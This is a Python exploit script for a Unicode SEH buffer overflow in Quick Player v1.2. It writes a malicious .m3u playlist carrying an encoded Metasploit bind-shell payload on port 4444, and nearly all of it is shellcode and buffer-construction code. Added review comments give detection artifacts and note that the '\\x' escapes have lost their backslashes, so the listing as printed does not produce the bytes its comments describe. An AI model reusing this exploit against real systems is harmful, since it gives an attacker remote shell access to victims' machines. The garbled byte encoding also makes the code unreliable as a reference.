# Title : Quick Player v1.2 Unicode BOF - bindshell
# Published : 2010-01-06
# Author : sinn3r
#!/usr/bin/python
## Quick Player v1.2 Unicode Buffer Overflow
## Found by : mr_me (great job by mr_me!) http://www.exploit-db.com/exploits/10797
## Coded by : sinn3r (x90.sinner{at}gmail{d0t]c0m)
## thanks : corelanc0d3r's unicode article - awesome job!
## Tested on : Windows XP SP3 ENG
## Oops! Here goes one of my n00b moments...
# windows/shell_bind_tcp lport=4444 http://metasploit.com
# Encoded payload body, labelled above as a Metasploit windows/shell_bind_tcp
# stage with lport=4444: on the affected host it would make the media-player
# process open a listening TCP socket on port 4444 (that listener is the
# host-side artifact to look for in IR/detection).
#
# NOTE(review): in this listing every "\xNN" escape has lost its backslash,
# so Python parses each "x50x50..." literal as plain ASCII text, not as the
# byte sequence the comments in this file describe.  The byte values spelled
# out here all appear to fall in 0x30-0x39 / 0x41-0x5A (digits and upper-case
# letters), i.e. an alphanumeric, unicode-tolerant encoding -- consistent
# with the unicode-expansion remarks further down; confirm against the
# original source before treating either observation as authoritative.
#
# The parenthesised adjacent string literals below are joined by the parser
# into a single str object at compile time.
bindshell = ("x50x50x59x41x49x41x49x41x49x41x49x41x51x41x54"
"x41x58x41x5ax41x50x55x33x51x41x44x41x5ax41x42"
"x41x52x41x4cx41x59x41x49x41x51x41x49x41x51x41"
"x50x41x35x41x41x41x50x41x5ax31x41x49x31x41x49"
"x41x49x41x4ax31x31x41x49x41x49x41x58x41x35x38"
"x41x41x50x41x5ax41x42x41x42x51x49x31x41x49x51"
"x49x41x49x51x49x31x31x31x31x41x49x41x4ax51x49"
"x31x41x59x41x5ax42x41x42x41x42x41x42x41x42x33"
"x30x41x50x42x39x34x34x4ax42x45x39x49x51x49x4a"
"x49x49x48x59x44x31x4ax54x51x4dx42x35x42x39x50"
"x49x50x49x51x39x51x39x50x49x51x39x50x49x51x39"
"x51x39x51x39x51x33x50x43x50x43x50x43x50x43x50"
"x43x50x37x42x31x50x5ax42x4ax51x31x50x58x50x50"
"x50x30x51x31x50x30x51x31x42x4bx51x31x51x31x42"
"x31x50x32x51x31x51x32x50x32x51x32x51x32x50x30"
"x50x42x51x32x51x31x51x32x50x58x42x30x50x38x51"
"x31x51x32x42x55x50x4ax51x39x50x49x42x4cx50x4d"
"x50x38x50x4fx44x39x50x43x50x30x50x47x42x50x50"
"x45x50x50x51x35x50x30x50x4bx50x39x50x4ax50x45"
"x50x45x43x31x50x4ex50x32x50x43x42x34x50x4cx50"
"x4bx50x50x51x42x50x46x50x50x50x4ex42x4bx42x31"
"x50x42x50x44x50x4cx50x4cx50x4bx51x36x50x32x51"
"x37x43x34x50x4ex42x4bx50x51x43x32x50x47x42x38"
"x50x44x50x4fx50x4cx42x57x51x32x51x5ax51x35x43"
"x46x51x36x50x51x50x49x42x4fx50x46x42x31x50x4b"
"x42x50x50x4cx42x4cx50x45x42x4cx50x50x43x31x50"
"x51x42x4cx51x35x42x32x50x46x50x4cx51x35x42x50"
"x50x4ax43x31x50x4ax42x4fx51x34x50x4dx51x37x42"
"x51x50x4bx42x57x51x39x44x32x50x4cx50x30x50x46"
"x50x32x50x43x43x37x50x4ex42x4bx50x43x42x42x51"
"x34x50x50x50x4cx50x4bx50x50x50x42x50x47x50x4c"
"x50x46x51x51x50x4ex50x30x50x4ex42x4bx50x47x50"
"x30x50x42x51x48x50x4fx42x55x50x4bx42x50x51x34"
"x50x34x50x43x43x4ax51x37x44x31x50x48x50x50x51"
"x32x44x30x50x4cx50x4bx50x42x42x48x50x42x50x38"
"x50x4cx50x4bx42x31x51x38x51x37x42x30x51x37x42"
"x51x50x4ex50x33x50x4dx50x33x50x45x42x4cx51x32"
"x43x39x50x4ex42x4bx51x35x43x34x50x4cx50x4bx51"
"x37x42x51x50x49x51x36x42x30x50x31x51x39x42x4f"
"x50x44x42x51x50x4fx50x30x50x4cx42x4cx50x4bx42"
"x51x50x4ax42x4fx51x36x42x4dx50x43x50x31x50x4a"
"x42x47x51x35x43x38x50x4bx42x30x50x51x42x45x50"
"x48x43x44x51x33x50x33x50x43x50x4dx50x4ax42x38"
"x51x35x42x4bx50x43x50x4dx50x45x44x34x50x43x51"
"x35x50x48x51x52x51x32x42x58x50x4cx50x4bx50x42"
"x44x38x50x47x51x44x51x37x44x31x50x4bx43x33x50"
"x50x43x36x50x4ex42x4bx50x44x50x4cx50x42x42x4b"
"x50x4cx50x4bx51x33x42x48x51x35x50x4cx50x45x42"
"x31x51x38x50x53x50x4ex42x4bx51x36x51x54x50x4e"
"x42x4bx51x37x44x31x51x38x42x30x50x4dx42x39x50"
"x51x42x34x50x45x42x54x51x34x42x44x51x33x42x4b"
"x50x43x42x4bx51x35x50x31x51x32x44x39x51x33x51"
"x5ax50x50x50x51x50x4bx50x4fx50x4bx50x50x50x42"
"x43x48x51x33x42x4fx42x31x50x4ax50x4ex42x4bx50"
"x46x42x52x50x4ax50x4bx50x4fx42x56x50x51x50x4d"
"x51x35x50x38x50x50x50x33x51x36x51x42x50x43x50"
"x30x50x47x42x50x51x35x50x38x51x34x50x37x42x30"
"x43x43x50x44x42x52x51x33x42x4fx50x42x43x44x50"
"x51x42x58x42x30x50x4cx50x42x42x37x51x35x44x36"
"x50x47x42x57x50x4bx50x4fx50x4ex50x35x50x4fx50"
"x48x50x4cx50x50x50x45x50x51x50x47x44x30x50x45"
"x42x30x50x46x51x39x50x4fx50x34x50x46x50x34x51"
"x32x44x30x51x35x50x38x42x31x50x39x50x4bx50x30"
"x42x30x42x4bx51x33x50x30x50x4bx50x4fx50x49x51"
"x35x50x50x42x30x50x46x50x30x42x30x42x30x51x36"
"x50x30x50x51x42x30x51x36x50x30x42x31x42x30x50"
"x42x42x50x51x35x50x38x51x38x42x4ax50x46x42x4f"
"x50x49x50x4fx51x39x42x50x50x4bx50x4fx50x48x42"
"x35x50x4dx42x39x50x4bx44x37x51x36x42x31x50x4b"
"x42x4bx51x32x42x53x50x50x51x58x50x45x51x42x51"
"x35x42x30x51x36x42x51x50x43x42x4cx50x4fx42x59"
"x50x4ax51x36x50x50x51x5ax51x36x42x50x51x36x50"
"x36x51x32x43x47x50x51x42x58x51x39x50x52x51x39"
"x50x4bx51x37x51x37x50x50x42x47x51x39x42x4fx50"
"x4ex50x35x50x46x50x33x50x42x44x37x42x31x42x58"
"x50x4ex42x37x50x48x51x59x51x36x51x48x50x4bx50"
"x4fx50x4bx50x4fx50x48x50x55x50x43x51x53x51x33"
"x42x43x51x33x51x57x50x50x42x48x42x30x42x54x51"
"x38x42x4cx51x35x42x4bx50x4dx50x31x50x49x42x4f"
"x50x4bx42x45x51x33x43x37x50x4fx43x49x50x49x51"
"x47x50x42x50x48x42x31x51x55x51x32x50x4ex51x32"
"x42x4dx51x33x42x31x50x4bx50x4fx50x48x51x45x50"
"x42x51x38x50x43x42x33x51x32x50x4dx42x30x43x34"
"x51x37x42x50x50x4dx51x49x51x38x51x53x50x51x50"
"x47x42x31x51x37x51x36x50x37x50x44x44x31x50x4c"
"x50x36x50x51x42x5ax50x42x50x32x42x31x51x39x50"
"x46x50x36x50x4dx50x32x51x39x42x4dx42x30x51x56"
"x50x4ax42x47x50x47x50x34x50x45x44x34x51x35x42"
"x4cx50x46x43x31x50x46x51x51x50x4ex42x4dx50x50"
"x51x34x42x31x50x34x50x42x50x30x50x48x50x46x50"
"x47x42x50x50x47x50x34x50x51x51x34x50x50x50x50"
"x50x50x51x46x50x43x43x36x51x36x50x36x42x30x50"
"x46x51x33x51x56x42x30x50x4ex50x46x50x36x51x33"
"x51x56x50x42x44x33x50x50x50x56x51x32x50x48x50"
"x51x51x59x50x4ax42x4cx50x47x50x4fx50x4cx50x46"
"x50x4bx50x4fx51x38x51x45x50x4ex42x49x50x4dx50"
"x30x42x30x50x4ex50x50x50x56x50x43x43x46x50x4b"
"x50x4fx50x50x50x30x50x45x50x38x50x46x51x58x50"
"x4ex51x57x51x35x50x4dx51x35x50x30x50x4bx50x4f"
"x50x4bx43x35x50x4dx42x4bx50x4ax42x30x50x4fx50"
"x45x50x4cx43x32x42x31x50x46x50x42x50x48x50x4d"
"x43x46x50x4dx50x45x50x4fx50x4dx50x4fx42x4dx50"
"x4bx50x4fx51x38x50x55x50x47x50x4cx51x33x50x36"
"x50x51x42x4cx51x36x51x5ax50x4dx50x50x50x4bx50"
"x4bx50x4dx50x30x50x44x50x35x50x46x43x35x50x4f"
"x50x4bx50x42x42x47x50x46x43x43x42x30x43x42x50"
"x42x50x4fx50x43x50x5ax51x37x44x30x50x42x42x53"
"x50x49x42x4fx50x4bx51x55x50x45x51x4ax51x31x51"
"x31x41x41")
# The playlist entry that is written to disk: a long filler run, a 4-byte
# SEH record overwrite, a short stub, an alignment run, the encoded payload,
# and trailing padding.  Note that `buffer` shadows the Python 2 builtin of
# the same name (this file uses the Python 2 print statement); renaming it
# would be cleaner but is left as-is here.
#
# Detection/IR note: the resulting .m3u contains one entry of several
# thousand characters made up almost entirely of repeated bytes
# (536 + 111 filler, 3000 trailing) around an upper-case alphanumeric blob --
# a playlist line of that shape is the file-side artifact to look for.
#
# NOTE(review): as in the payload above, the "\xNN" escapes in this listing
# have lost their backslashes, so as printed "x41"*536 is 1608 characters of
# text rather than 536 bytes of 0x41, and none of the byte/offset comments
# below hold for the listing as shown.
buffer = (
"x41"*536 + # junk
####################################################################
# SEH Chain:
# NOTE(review): the dword values quoted in the next two comments do not
# follow from the bytes shown (e.g. 0x41,0x4D widened to UTF-16LE reads as
# 0x004D0041, not 0x004A0059); they look like stale comments from an earlier
# revision -- confirm against the original.
"x41x6D" # Pointer to Next SEH record (unicode = 0x6D004100)
"x41x4D" # SE Handler (unicode format = 0x004A0059)
####################################################################
# START CARVING THE RET ADDRESS:
# 0x0012e270 (first item on the stack) + 0x11006100 - 0x11006000 = 0x0012E370 (RET)
# The adjacent literals from the SEH chain down to "xC3" are joined by the
# parser into ONE literal before the surrounding `+` operators are applied;
# the "x6D" separators are the author's unicode-expansion filler.
"x58" # POP EAX
"x6D" # Separator
"x05x61x11" # ADD EAX, 0x11006100 (chars expanded due to unicode)
"x6D" # Separator
"x2Dx60x11" # SUB EAX, 0x11006000 (chars expanded due to unicode)
"x6D" # Separator
"x50" # PUSH EAX
"x6D" # Separator
"xC3"+ # RETN ; (0x0012E370)
#####################################################################
# bindshell lport 4444
"x41"*111+ # Alignment
bindshell+ # bindshell lport 4444 (defined above)
"x44"*3000) # some mo' padding to please my eyes
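# Write the assembled entry out as the playlist file.  A context manager
# guarantees the handle is closed even if the write raises; the original
# `open`/`write`/`close` sequence leaked the handle on error.
#
# NOTE(review): mode "w" is text mode, which on Windows (the stated test
# platform) translates any 0x0A byte into 0x0D 0x0A on write.  Whether the
# payload contains such a byte cannot be told from this listing (its escapes
# are stripped); "wb" would be the byte-exact choice -- confirm before
# relying on the written bytes being identical to `buffer`.
with open("quick_player_exploit.m3u", "w") as f:
    f.write(buffer)
# Single parenthesised argument prints identically under Python 2 and 3.
print("[*] quick_player_exploit.m3u created! ph33r!")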